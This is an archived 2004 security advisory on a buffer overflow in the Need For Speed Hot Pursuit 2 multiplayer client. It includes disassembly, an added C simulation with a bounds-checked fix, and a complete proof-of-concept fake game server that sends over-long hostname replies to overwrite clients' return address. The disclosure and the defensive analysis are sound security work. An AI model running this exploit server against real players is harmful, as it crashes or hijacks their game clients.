[NEWS] Need For Speed Hot Pursuit II Multiplayer Client Buffer Overflow
From: SecuriTeam (support_at_securiteam.com)
Date: 01/26/04
To: list@securiteam.com Date: 26 Jan 2004 12:11:42 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Need For Speed Hot Pursuit II Multiplayer Client Buffer Overflow
------------------------------------------------------------------------
SUMMARY
Need For Speed Hot Pursuit 2 is a racing game developed by
<http://www.blackboxgaming.com> BlackboxGames and published by
<http://www.ea.com> Electronic Arts.
The NFSHP2 client is vulnerable to a buffer overflow caused by an over-long
string in the information a server sends back when the client enters
multiplayer mode.
DETAILS
Vulnerable Systems:
* Need For Speed Hot Pursuit 2 version 2.42 or prior
The information queries are made automatically by every client that enters
the multiplayer screen of the game: a request packet is sent to each and
every server in the game's server list, and the client then waits for their
replies.
There is a problem in the way the client handles the servers' replies,
more specifically in handling the values that come after the following
parameters: gamename, gamever, hostname, gametype, mapname and gamemode.
Shown here is a small snippet of code that permits a buffer overflow:
:0050558D 6814206E00 push 006E2014
:00505592 6800E86900 push 0069E800 ("mapname")
:00505597 56 push esi
:00505598 E873930000 call 0050E910 ; SEARCH FOR "mapname", eax -> its value
:0050559D 83C40C add esp, 0000000C
:005055A0 8D9344010000 lea edx, dword[ebx+00000144] ; edx -> destination buffer
:005055A6 8A08 mov cl, byte[eax] ; load one byte of the value
:005055A8 40 inc eax
:005055A9 880A mov byte[edx], cl ; store it, no bounds check
:005055AB 42 inc edx
:005055AC 84C9 test cl, cl ; stop only at the NUL terminator
:005055AE 75F6 jne 005055A6
Basically what the code does is look up the string mapname in the packet
buffer and copy the value that follows it, one byte at a time until the
terminating NUL, into the buffer at ebx+144h, which is evidently smaller than
what an attacker can send; no length check is made, and the other parameters
listed above are handled the same way. As stated before, every client
performs these information queries against every listed server, so a single
fake server exploiting this vulnerability could execute arbitrary code on,
and thereby take over, all the clients that query it, or simply crash them
and prohibit anyone from playing.
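As an added illustration of the two passages above (the \key\value reply format that every client fetches from every listed server, and the unchecked byte-copy shown in the disassembly), the following C program is not from the advisory or from the game: it models the lookup-and-copy on a simulated stack frame and sets a hardened, length-checked copy beside it. The frame layout (FIELD_SZ, RET_OFF, FRAME_SZ), the two constructed replies and the names find_value, copy_unbounded, copy_bounded, unbounded_smashes_ret, bounded_copy_status and bounded_value_equals are all assumptions made for the example; the game's real buffer size and offsets are not known from the advisory.

```c
#include <stdio.h>
#include <string.h>

/* Simulated client stack frame (assumed layout, not the game's real one):
 * a FIELD_SZ-byte destination buffer at offset 0 and, RET_OFF bytes in,
 * a 4-byte slot standing in for the saved return address. */
#define FIELD_SZ  64
#define RET_OFF   96
#define FRAME_SZ  160

/* Constructed replies in the \key\value format the advisory describes. */
static const char BENIGN_REPLY[] =
    "\\gamename\\nfs6\\gamever\\240\\hostname\\Friday night race"
    "\\hostport\\8511\\mapname\\Fall Winds\\gametype\\Single Race"
    "\\final\\\\queryid\\2.1";

/* 96 filler bytes put the next four ("BBBB") exactly on the return slot. */
static const char MALICIOUS_REPLY[] =
    "\\gamename\\nfs6\\gamever\\240\\hostname\\"
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    "BBBB"
    "\\hostport\\8511\\mapname\\Fall Winds\\final\\\\queryid\\2.1";

/* Locate the value of \key\ in a reply: returns a pointer to its first byte
 * and stores its length (up to the next backslash or end of string) in *len,
 * or NULL if the key is absent. A model of the lookup the disassembly
 * calls, not the game's routine. */
static const char *find_value(const char *reply, const char *key, size_t *len)
{
    size_t klen = strlen(key);
    const char *p = reply;
    while (*p == '\\') {
        const char *k = p + 1;
        const char *kend = strchr(k, '\\');
        if (!kend) return NULL;                  /* trailing key, no value */
        const char *val = kend + 1;
        const char *vend = strchr(val, '\\');
        if ((size_t)(kend - k) == klen && memcmp(k, key, klen) == 0) {
            *len = vend ? (size_t)(vend - val) : strlen(val);
            return val;
        }
        if (!vend) return NULL;
        p = vend;
    }
    return NULL;
}

/* What the disassembly's loop does: copy the whole value plus a
 * terminator with no regard for the size of dst. */
static void copy_unbounded(unsigned char *dst, const char *val, size_t len)
{
    for (size_t i = 0; i < len; i++) dst[i] = (unsigned char)val[i];
    dst[len] = 0;
}

/* Hardened form: refuse any value that does not fit together with its NUL. */
static int copy_bounded(char *dst, size_t dstsz, const char *val, size_t len)
{
    if (len >= dstsz) return -1;
    memcpy(dst, val, len);
    dst[len] = 0;
    return 0;
}

/* Copy `key` from `reply` into the simulated frame the unbounded way and
 * report on the return slot: 1 = overwritten, 0 = intact, -1 = key missing
 * or value too large for the simulation itself to stay in bounds. */
static int unbounded_smashes_ret(const char *reply, const char *key)
{
    unsigned char frame[FRAME_SZ];
    size_t len;
    const char *val = find_value(reply, key, &len);
    if (!val || len >= FRAME_SZ) return -1;
    memset(frame, 0, sizeof frame);
    memcpy(frame + RET_OFF, "RET!", 4);          /* stand-in for saved EIP */
    copy_unbounded(frame, val, len);
    return memcmp(frame + RET_OFF, "RET!", 4) != 0;
}

/* Hardened path: 0 = ok, -1 = too long (drop the reply), -2 = key missing. */
static int bounded_copy_status(const char *reply, const char *key,
                               char *out, size_t outsz)
{
    size_t len;
    const char *val = find_value(reply, key, &len);
    if (!val) return -2;
    return copy_bounded(out, outsz, val, len);
}

/* 1 if the hardened copy of `key` succeeds and yields exactly `expect`. */
static int bounded_value_equals(const char *reply, const char *key,
                                const char *expect)
{
    char out[FIELD_SZ];
    return bounded_copy_status(reply, key, out, sizeof out) == 0 &&
           strcmp(out, expect) == 0;
}

int main(void)
{
    char host[FIELD_SZ];
    printf("benign    reply: hostname ok=%d, return slot smashed=%d\n",
           bounded_value_equals(BENIGN_REPLY, "hostname", "Friday night race"),
           unbounded_smashes_ret(BENIGN_REPLY, "hostname"));
    printf("malicious reply: hardened status=%d, return slot smashed=%d\n",
           bounded_copy_status(MALICIOUS_REPLY, "hostname", host, sizeof host),
           unbounded_smashes_ret(MALICIOUS_REPLY, "hostname"));
    return 0;
}
```

Compile with cc and run: the malicious reply's 100-byte hostname lands "BBBB" on the simulated return slot under the unbounded copy, while the bounded copy returns -1 so the reply can be discarded before anything is written. A check of this shape on every field the advisory names (gamename, gamever, hostname, gametype, mapname, gamemode) is exactly what the client lacks; rejecting the reply outright is preferable to silent truncation because a server that sends over-long fields is already misbehaving.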
A proof of concept code is shown below:
/*
by Luigi Auriemma
UNIX & WIN VERSION
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"     /* author's helper: provides std_err() on Windows */
    #define close closesocket
    typedef int socklen_t;  /* winsock.h has no socklen_t */
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif

#define VER     "0.1"
#define BUFFSZ  2048
#define PORT    61220          /* UDP port the clients send their queries to */
#define RETADD  0xdeadc0de     /* value written over the saved return address */
#define RETOFF  540            /* offset of the "0000" placeholder in pck[] */
#define NFS240  "18022640"
#define NFS242  "18088178"
#define NFSOFF  669 /* referred to pck[] nver, don't change it */

void std_err(void);

int main(int argc, char *argv[]) {
    int         sd,
                err,
                on = 1;
    socklen_t   psz;
    unsigned int ret;
    struct sockaddr_in  peer;
#ifdef WIN32
    WSADATA     wsadata;
#endif
    u_char      *buff,
                pck[] =
                "\\gamename\\nfs6"
                "\\gamever\\240" // it is useless
                "\\hostname\\"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaa"
                "0000" // return address
                "\\hostport\\8511"
                "\\mapname\\Fall Winds"
                "\\gametype\\Single Race"
                "\\numplayers\\1"
                "\\maxplayers\\8"
                "\\gamemode\\openplaying"
                "\\pbmd\\0"
                "\\password\\0"
                "\\nver\\" NFS240
                "\\ctid\\6"
                "\\res\\38"
                "\\dir\\0"
                "\\laps\\2"
                "\\ded\\0"
                "\\final\\"
                "\\queryid\\2.1";

    setbuf(stdout, NULL);

    fputs("\n"
        "Need for Speed Hot pursuit 2 <= 242 client's buffer overflow "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web: http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\nUsage: %s <version>\n"
            "\n"
            "Version:\n"
            "240 = this is the default (1.0) and more diffused version\n"
            "242 = the latest patched version, rarely used by players\n"
            "\n", argv[0]);
        exit(1);
    }

    if(!memcmp(argv[1], "240", 3)) {
        printf("Selected version 240 (nver %s)\n", NFS240);
    } else if(!memcmp(argv[1], "242", 3)) {
        printf("Selected version 242 (nver %s)\n", NFS242);
        /* both nver strings are 8 bytes, so the field is patched in place */
        memcpy(pck + NFSOFF, NFS242, sizeof(NFS242) - 1);
    } else {
        printf("\nError: you must choose between 240 and 242 only\n");
        exit(1);
    }

#ifdef WIN32
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    peer.sin_addr.s_addr = INADDR_ANY;
    peer.sin_port        = htons(PORT);
    peer.sin_family      = AF_INET;
    psz                  = sizeof(peer);

    printf("\nBinding UDP port %u\n", PORT);
    err = setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on));
    if(err < 0) std_err();
    err = bind(sd, (struct sockaddr *)&peer, psz);
    if(err < 0) std_err();

    printf("The return address will be overwritten with 0x%08x\n", RETADD);
    /* write exactly the 4 bytes of the "0000" placeholder: a u_long store
       is 8 bytes on 64-bit hosts and would clobber the following field */
    ret = RETADD;
    memcpy(pck + RETOFF, &ret, 4);

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    fputs("Clients:\n", stdout);
    /* act as a fake server: answer every client query with the malicious reply */
    while(1) {
        err = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
        if(err < 0) std_err();
        printf("%16s:%hu -> ", inet_ntoa(peer.sin_addr), htons(peer.sin_port));
        err = sendto(sd, pck, sizeof(pck) - 1, 0, (struct sockaddr *)&peer, psz);
        if(err < 0) std_err();
        fputs("BOOM\n", stdout);
    }

    close(sd);
    return(0);
}

#ifndef WIN32
void std_err(void) {
    perror("\nError");
    exit(1);
}
#endif
Patch Availability:
There is no fix available. There has been no reply from either Electronic
Arts or BlackboxGaming.
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@altervista.org> Luigi
Auriemma
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.